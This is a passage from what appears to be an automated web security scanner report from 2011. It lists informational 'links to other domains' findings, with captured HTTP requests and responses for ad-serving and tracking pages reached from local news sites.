WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 09 Mar 2011 18:37:26 GMT
ETag: "530ce989decb1:9f2"
Vary: Accept-Encoding
Expires: Sat, 09 Apr 2011 12:29:27 GMT
Date: Sat, 09 Apr 2011 12:29:27 GMT
Connection: close
Content-Length: 229561

if(!window.Silverlight)
{window.Silverlight={};}
Silverlight._silverlightCount=0;Silverlight.fwlinkRoot='http://go2.microsoft.com/fwlink/?LinkID=';Silverlight.onGetSilverlight=null;Silverlight.onSil
...[SNIP]...
;if(this.widgetClassType=="WNVideoCanvas"||this.widgetClassType=="WNGallery"||this.widgetClassType=="WNVideoCanvas2"||this.widgetClassType=="WNImageCanvas"||this.widgetClassType=="WNImageGallery"){f+='<a style="color:#333;text-decoration:none;" href="http://www.macromedia.com/go/getflash/" target="_blank">You need to download the latest version of flash player to use this player</a>
...[SNIP]...
10.133. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cplads.appspot.com
Path:   /creatives/aio_300_250/GoogleForm_dp.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /creatives/aio_300_250/GoogleForm_dp.html?click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBFTSpqVKgTfayIsjhlQe_uo2ECq3V39oBnZj0wiLAjbcBgPX2HxABGAEg2JK1CzgAUNGf66sGYMnug4jwo-wSsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBLWh0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL3N0b3J5LmFzcD9TPTUwMzEzN7gCGMgC3b-bHKgDAdEDW-WrP1ZkL_joA9Qq6APGB-gDxAfoA44D9QMAAABE%26num%3D1%26sig%3DAGiWqtyZaV6gso4B-6Xa4n-NKpfXOwasuQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: cplads.appspot.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370546&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D503137&dt=1302352546546&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302352546602&frm=0&adk=3878574007&ga_vid=316624107.1302352547&ga_sid=1302352547&ga_hid=1770797232&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D503137&fu=0&ifi=1&dtd=296&xpc=mIXxq5O1Gc&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "f-dPwg"
Date: Sat, 09 Apr 2011 12:35:55 GMT
Expires: Sat, 09 Apr 2011 12:45:55 GMT
Content-Type: text/html
Server: Google Frontend
Cache-Control: public, max-age=600
Age: 23
Content-Length: 13989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript">
</script>
...[SNIP]...
</div>
<a href="http://lp.aionline.edu/display/gen-tm/landing-377GJ-30342I.html" target="_blank">Privacy Policy</a>
       <a href="http://lp.aionline.edu/display/gen-tm/landing-377GJ-3030P6.html" target="_blank">About Us</a>
...[SNIP]...
10.134. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2507573;type=ads-a681;cat=ads-a941;ord=1;num=8143914125394.076? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 09 Apr 2011 00:16:53 GMT
Expires: Sat, 09 Apr 2011 00:16:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Google Code for
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/992540712/?label=jdLoCOiOjAIQqPCj2QM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1063327355/?label=BZuACJ2wvgIQ-6yE-wM&amp;guid=ON&amp;script=0"/>
</div>
</noscript><!-- "Ad Words House Advertiser" c/o "Google Internal Marketing", segment: 'Business Solutions' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=38627&partnerID=216&clientID=4608&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=38627&partnerID=216&clientID=4608&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...
10.135. http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ftpcontent.worldnow.com
Path:   /wcax/custom/branding_feature_i.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wcax/custom/branding_feature_i.html?referrerDomain=www.wcax.com HTTP/1.1
Host: ftpcontent.worldnow.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "9b0b0e6988e51ddbde9d601fdc9a97ea:1246945003"
Last-Modified: Thu, 11 Jun 2009 17:10:26 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:29:28 GMT
Connection: close
Content-Length: 337

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Untitled</title>
</head>

<body style="margin:0px">

<a href="http://www.wcax.com/Global/story.asp?S=475866" target="_top"><img src="http://WCAX.images.worldnow.com/images/272337_G.jpg" border=0 width=305 height=70>
...[SNIP]...
10.136. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&format=200x200_as&output=html&h=200&w=200&lmt=1302370438&ad_type=text_image&color_bg=FFFFFF&color_border=336699&color_link=0000FF&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Fwww.vermontopia.com%2Fevent%2F%3FL%3D408799%26referrerDomain%3Dwww.wcax.com&dt=1302352438548&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302352438617&frm=0&adk=2806139730&ga_vid=1407274445.1302352252&ga_sid=1302352252&ga_hid=1997656492&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=1106339473&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Flink.asp%3FL%3D408799&fu=0&ifi=1&dtd=174&xpc=Fy3rS2zNLi&p=http%3A//www.vermontopia.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:34:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11454

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.vermontopia.com/event/%253FL%253D408799%2526referrerDomain%253Dwww.wcax.com%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3DCulinary-Schools.collegebound.net%26adT%3DCulinary%2BSchools%26adU%3DLeCordonBleuCollege-LasVegas.com%26adT%3DCulinary%26gl%3DUS&amp;usg=AFQjCNGNNRDLyO-miciC1sNIEot5nePMgA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.137. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=60&slotname=7816900575&w=468&lmt=1302639806&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Farchives%2F&dt=1302621806882&shv=r20110406&jsv=r20110406&saldr=1&correlator=1302621806890&frm=0&adk=517946746&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=1000755112&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&eid=33895130&ref=http%3A%2F%2Fwww.mvtimes.com%2Fexpired.php&fu=0&ifi=1&dtd=19&xpc=WWlgNpgTyR&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/archives/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:23:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10744

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mvtimes.com/archives/%26hl%3Den%26client%3Dca-pub-5597875046540809%26adU%3Dwww.barharborinfo.com%26adT%3DVisit%2BBar%2BHarbor%2BMaine%26gl%3DUS&amp;usg=AFQjCNGlDJiev75POr6DOtFMkfIxArwZqQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.138. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302371964&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D14408230&dt=1302353964431&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302353964444&frm=0&adk=2815960337&ga_vid=1369581838.1302353964&ga_sid=1302353964&ga_hid=152665965&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1079&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D465801&fu=0&ifi=1&dtd=18&xpc=9ZXiaP1eky&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:59:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4120

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wcax.com/Global/story.asp%253FS%253D14408230%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3DFreeScore.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFaOnIqARU0mP-HmiMcdrJddPHpaw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.139. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639810&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php&dt=1302621810909&bpp=2&shv=r20110406&jsv=r20110406&prev_slotnames=4254550909&correlator=1302621810900&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=282251794&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.mvtimes.com%2Farchives%2F&fu=0&ifi=2&dtd=7&xpc=CSZzOTbuz0&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:23:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2227

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
5waHBCBwiDhAcQrgFQAVooZEJvRXppRVlYcGh0VGx6UGNVa1FtQ0lmQ2NGdFNWakxKVXpHOTBlcGgadSMxAT-AAaDh15YGkAGlrgaoAfj8BrABAg;redirect=http%3A%2F%2Fwww.miravalresorts.com%2FBest-of-Spa%2F%3Fcode%3D461%26src%3D461"><img src="http://content.quantserve.com/ads/miraval/MiravalResorts.20110405.300x250.jpg" style="border-style: none"/></A><img src="http://exch.quantserve.com/pixel/p-0eL46oTNLkwRE.gif?media=ad&p=TaRueAABaJMK2iAUrcQEk-uOdratymn088bK2w&r=52699263&rand=27697&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.26,_imp.optscore.50,_imp.optdr.0&rtbip=64.74.116.151&rtbdata2=EAAaFE1pcmF2YWxSZXNvcnRzX1EyLTExIL8LKIwYMIDcHjo1aHR0cDovL3d3dy5tdnRpbWVzLmNvbS9tYXJ0aGFzLXZpbmV5YXJkL29uLWlzbGFuZC5waHBCBwiDhAcQrgFQAVooZEJvRXppRVlYcGh0VGx6UGNVa1FtQ0lmQ2NGdFNWakxKVXpHOTBlcGgadSMxAT-AAaDh15YGkAGlrgaoAfj8BrABAg" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...
10.140. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370460&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D14408244&dt=1302352460281&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302352460312&frm=0&adk=2815960337&ga_vid=214691397.1302352461&ga_sid=1302352461&ga_hid=1450651812&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18197&fu=0&ifi=1&dtd=457&xpc=Z3aGvJ5yXX&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:34:28 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4895

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CPjKh5-30dTaFRCsAhj6ATIIudHRD5D792U">
...[SNIP]...
cs/stores/servlet/ProductDisplay%253FcatalogId%253D10101%2526storeId%253D10051%2526productId%253D136611%2526langId%253D-1%2526categoryId%253D38383%2526cm_mmc%253DGoogle_Banner-_-Men-_-Twill-_-Display"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPjKh5-30dTaFRCsAhj6ATIIudHRD5D792U" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNX-GVFKgTd2FHNTtlQfFkqDiCfS17vwBrLD2rxm07qWtWbCYRhABGAEg2JK1CzgAULaN_7L8_____wFgye6DiPCj7BKgAaSk2fIDsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBBNoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL3N0b3J5LmFzcD9TPTE0NDA4MjQ0uAIYwAIGyAL0nPcEqAMB6AOiAegD1CroA8YH6AMQ9QMAAABE9QMQAIAB%26num%3D1%26sig%3DAGiWqtwH1m7k228-DVEq5dUUR5ia4NN2sQ%26client%3Dca-pub-2103553853082603%26adurl%3Dhttp://www.carhartt.com/webapp/wcs/stores/servlet/ProductDisplay%253FcatalogId%253D10101%2526storeId%253D10051%2526productId%253D136611%2526langId%253D-1%2526categoryId%253D38383%2526cm_mmc%253DGoogle_Banner-_-Men-_-Twill-_-Display" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wcax.com/Global/story.asp%253FS%253D14408244%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3Dwww.Carhartt.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNESrui7AvPwWnAQT9BHImcgzKvsng" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.141. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=60&slotname=2607287140&w=468&lmt=1302639837&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Farticle.php%3Fid%3D4030&dt=1302621837946&bpp=4&shv=r20110406&jsv=r20110406&correlator=1302621837958&frm=0&adk=4281096709&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=2134607123&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fdirectory%2F%3Fa%3D1&fu=0&ifi=1&dtd=17&xpc=GAxmbObMj4&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

